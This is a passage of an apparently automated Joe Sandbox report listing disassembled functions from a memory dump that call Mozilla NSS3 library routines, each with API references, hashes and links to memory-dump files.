                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2926855110-0
                                                                                                                                                                                                                                                                                          • Opcode ID: dca024abdc6f2c6c55c40057f052ab6823e682c3eb27b97fdaf8e45548282939
                                                                                                                                                                                                                                                                                          • Instruction ID: 18ffe39640f268f2e8afb711229adb43930cf8b6c6d7c4c551f92c3c149cdf10
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dca024abdc6f2c6c55c40057f052ab6823e682c3eb27b97fdaf8e45548282939
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD312AB2E001155FEF04CFA58D4A5AF7766AFC4328B188138E81957B42EB319D15C7A1
                                                                                                                                                                                                                                                                                          Function 6C718C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C718C7C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C800A27), ref: 6C7B9DC6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C800A27), ref: 6C7B9DD1
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7B9DED
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C718CB0
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C718CD1
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C718CE5
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C718D2E
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C718D62
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C718D93
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3131193014-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fe0ad37531af7b90299d6d42ea4035664b680124dc610a8de846ee4a23d4ebe5
                                                                                                                                                                                                                                                                                          • Instruction ID: 98a230e5ec17f2ef54c2dc965d135243aa2d29d793313fb4bd8909f6a77931a8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe0ad37531af7b90299d6d42ea4035664b680124dc610a8de846ee4a23d4ebe5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE318A71E05301AFDB00AF68DE4679AB7B4BF59318F29013AEA1967F90D770A924C7C1
                                                                                                                                                                                                                                                                                          Function 6C759D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C759C5B), ref: 6C759D82
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C759C5B), ref: 6C759DA9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?,00000000), ref: 6C75136A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?,00000000), ref: 6C75137E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: PL_ArenaGrow.NSS3(?,6C6EF599,?,00000000,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?), ref: 6C7513CF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: PR_Unlock.NSS3(?,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?,00000000), ref: 6C75145C
                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C759C5B), ref: 6C759DCE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6EF599,?,00000000), ref: 6C7513F0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751340: PL_ArenaGrow.NSS3(?,6C6EF599,?,?,?,00000000,00000000,?,6C6F895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C751445
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C759C5B), ref: 6C759DDC
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C759C5B), ref: 6C759DFE
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C759C5B), ref: 6C759E43
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C759C5B), ref: 6C759E91
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C74FAAB,00000000), ref: 6C75157E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C74FAAB,00000000), ref: 6C751592
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751560: memset.VCRUNTIME140(?,00000000,?), ref: 6C751600
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751560: PL_ArenaRelease.NSS3(?,?), ref: 6C751620
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C751560: PR_Unlock.NSS3(?), ref: 6C751639
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3425318038-0
                                                                                                                                                                                                                                                                                          • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                                                          • Instruction ID: 0f00c6b2779c509094ede76474ab702be77dafca84afd0db962c6f67c07a5989
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C741A0B5601602AFE740CF14DA48B92BBA5FF55348F948128D8184BFA0EF72E835CF80
                                                                                                                                                                                                                                                                                          Function 6C71DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C71DDEC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7508B4
                                                                                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C71DE70
                                                                                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C71DE83
                                                                                                                                                                                                                                                                                          • HASH_ResultLenByOidTag.NSS3(?), ref: 6C71DE95
                                                                                                                                                                                                                                                                                          • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C71DEAE
                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C71DEBB
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C71DECC
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1091488953-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7e6ffbb575d7235694e37f6e6b42c1b72cc7a3195913e2c30426287f10c27300
                                                                                                                                                                                                                                                                                          • Instruction ID: 54c4ffb3ea8a54def19392d8d1cffb65bbe0d5bb9a1cd5aaae2c93d70b7c0641
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e6ffbb575d7235694e37f6e6b42c1b72cc7a3195913e2c30426287f10c27300
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F31EBB29042146BDB01AE64AE49BBB76AC9F64709F090135ED09A7B41F731D918CAE2
                                                                                                                                                                                                                                                                                          Function 6C6F7E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C6F7E48
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C6F7E5B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6F7E7B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C748D2D,?,00000000,?), ref: 6C74FB85
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C74FBB1
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C81925C,?), ref: 6C6F7E92
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8218D0,?), ref: 6C74B095
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6F7EA1
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(00000004), ref: 6C6F7ED1
                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(00000004), ref: 6C6F7EFA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3989529743-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 96d5e9badbb3cb51183922f3c1a915d26a3e306dad3bc96cd1f5be85be1bf610
                                                                                                                                                                                                                                                                                          • Instruction ID: 61d8368aa179dcf18aebf2d82419b8f33bde51c2d7429ac96d26e71d3783f8d7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96d5e9badbb3cb51183922f3c1a915d26a3e306dad3bc96cd1f5be85be1bf610
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C431C1B2E012119BFB108B689D48B9B77E9AF04358F054825DC25EBB01FB30EC16C7A4
                                                                                                                                                                                                                                                                                          Function 6C74DC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C74D9E4,00000000), ref: 6C74DC30
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C74D9E4,00000000), ref: 6C74DC4E
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C74D9E4,00000000), ref: 6C74DC5A
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C74DC7E
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C74DCAD
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2632744278-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 34f00d68bf07ddb0bd871c367b0a1a247f2180793a76c63c594d1ad740258c1f
                                                                                                                                                                                                                                                                                          • Instruction ID: b4b04aec7e2313f6baa3b5c85e95e78504c706dde0581b7da2129690df729a68
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34f00d68bf07ddb0bd871c367b0a1a247f2180793a76c63c594d1ad740258c1f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65316DB5A002009FD750CF1DD984A96B7F8AF25358F148439E98CCBB41E7B1E944CBA5
                                                                                                                                                                                                                                                                                          Function 6C712E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C70E728,?,00000038,?,?,00000000), ref: 6C712E52
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C712E66
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C712E7B
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C712E8F
                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C712E9E
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C712EAB
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C712F0D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3106257965-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 03378217c518071632f2c0c9988438d36084263af84ae1989e93b2d894b9368e
                                                                                                                                                                                                                                                                                          • Instruction ID: 7df2389d7b52cdb11e9b4b5fae85d7bd71ebec1455aa43daf5524344c7253763
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03378217c518071632f2c0c9988438d36084263af84ae1989e93b2d894b9368e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A031F6B5A04105ABEF006F28DD48866B779FF5625CF088175EC0887B12EB31DC68C7D0
                                                                                                                                                                                                                                                                                          Function 6C731EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&sl,6C716295,?,00000000,?,00000001,S&sl,?), ref: 6C731ECB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000001,?,S&sl,6C716295,?,00000000,?,00000001,S&sl,?), ref: 6C731EF1
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C731F01
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C731F39
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73FE20: TlsGetValue.KERNEL32(6C715ADC,?,00000000,00000001,?,?,00000000,?,6C70BA55,?,?), ref: 6C73FE4B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C73FE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C73FE5F
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C731F67
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterErrorSection$Unlock
                                                                                                                                                                                                                                                                                          • String ID: S&sl
                                                                                                                                                                                                                                                                                          • API String ID: 704537481-2217361988
                                                                                                                                                                                                                                                                                          • Opcode ID: bafcc8d1f0c360205d77fed7bedeb518f804d9bc00ba6d3b8b13ebc7d251efd6
                                                                                                                                                                                                                                                                                          • Instruction ID: 0dc4d9505297e78fbb70b53ada33e52b501d35ace5f1722c107834ec800fd006
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bafcc8d1f0c360205d77fed7bedeb518f804d9bc00ba6d3b8b13ebc7d251efd6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B213472A01225ABEB00AE29ED48E9A3769AF4136DF185034FC0C87B53EB30D954C7E1
                                                                                                                                                                                                                                                                                          Function 6C75CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,6C75CD93,?), ref: 6C75CEEE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
